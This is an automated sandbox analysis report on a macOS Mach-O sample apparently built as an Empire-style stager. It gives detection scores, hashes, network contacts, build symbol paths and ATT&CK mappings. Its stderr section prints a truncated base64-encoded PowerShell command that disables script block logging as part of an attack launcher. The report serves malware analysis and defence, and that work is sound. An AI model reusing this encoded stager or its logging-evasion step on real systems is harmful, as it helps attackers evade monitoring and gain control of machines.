Loading ...

Play interactive tourEdit tour

Analysis Report SwWPxGBaKt.macho

Overview

General Information

Sample Name:SwWPxGBaKt.macho
Analysis ID:538
MD5:480e81fbccf44939cf4ad4d21f9ba230
SHA1:ff68dd82ddd872b04b8605adfc7be8f42bb38b0e
SHA256:c364dcfa20543edbe9af0c94bedab5d79002277f97dfcbea3a704e5b4f1088e9
Infos:

Most interesting Screenshot:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Process executable has a file extension which is uncommon (probably to disguise the executable)
Contains symbols with paths

Classification

Startup

  • System is macvm-highsierra
  • SwWPxGBaKt.macho (MD5: 480e81fbccf44939cf4ad4d21f9ba230) Arguments: /Users/berri/Desktop/SwWPxGBaKt.macho
  • cleanup

Yara Overview

No yara matches

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: SwWPxGBaKt.machoAvira: detected
Multi AV Scanner detection for submitted fileShow sources
Source: SwWPxGBaKt.machoVirustotal: Detection: 33%Perma Link
Source: SwWPxGBaKt.machoReversingLabs: Detection: 44%
Source: unknownTCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknownTCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknownTCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.109.202
Source: unknownTCP traffic detected without corresponding DNS query: 2.22.90.177
Source: unknownTCP traffic detected without corresponding DNS query: 2.22.90.177
Source: unknownTCP traffic detected without corresponding DNS query: 17.253.109.202
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmpString found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmpString found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmpString found in binary or memory: http://www.apple.com/certificateauthority0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmpString found in binary or memory: https://www.apple.com/appleca/0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.0000000103002000.0000000103042000.rw-.sdmpString found in binary or memory: https://www.python.org/psf/license/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49238
Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 443
Source: classification engineClassification label: mal60.evad.macMACHO@0/0@0/0
Source: submission SwWPxGBaKt.machoMach-O symbol: /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/main.o
Source: submission SwWPxGBaKt.machoMach-O symbol: /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/AppDelegate.o
Source: submission SwWPxGBaKt.machoMach-O symbol: /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/
Source: submission SwWPxGBaKt.machoMach-O symbol: /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/
Source: submitted sampleStderr: File '<string>'; line 1 wershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAcwBTAEUAbQBiAEwAeQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAVABWAGEAbAB1AEUAKAAkAE4AVQBsAGwAKQA7AEkAZgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8AbABMAGUAQwB0AGkATwBOAFMALgBHAGUATgBlAHIAaQBjAC4ARABJAGMAVABJAE8ATgBBAHIAWQBbAFMAVABSAEkAbgBnACwAUwBZAHMAVABlAG0ALgBPAEIASgBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAVgBhAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEATAB9AEUAbABzAEUAewBbAFMAQwBSAGkAUABUAEIATABPAEMAawBdAC4AIgBHAGUAdABGAEkAZQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAdQBFACgAJABOAFUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwB0ACAAQwBvAGwATABlAEMAVABJAE8AbgBzAC4ARwBFAG4AZQByAGkAQwAuAEgAYQBTAGgAUwBFAFQAWwBzAFQAcgBJAE4AZwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBzAEUATQBCAEwAWQAuAEcARQBUAFQAW ^SyntaxError: invalid syntax: exit code = 0

Hooking and other Techniques for Hiding and Protection:

barindex
Process executable has a file extension which is uncommon (probably to disguise the executable)Show sources
Source: /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32 (PID: 571)Process executable with extension: /Users/berri/Desktop/SwWPxGBaKt.machoJump to behavior
Source: /Users/berri/Desktop/SwWPxGBaKt.macho (PID: 571)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /Users/berri/Desktop/SwWPxGBaKt.macho (PID: 571)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionMasquerading1OS Credential DumpingSystem Information Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout

Behavior Graph

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.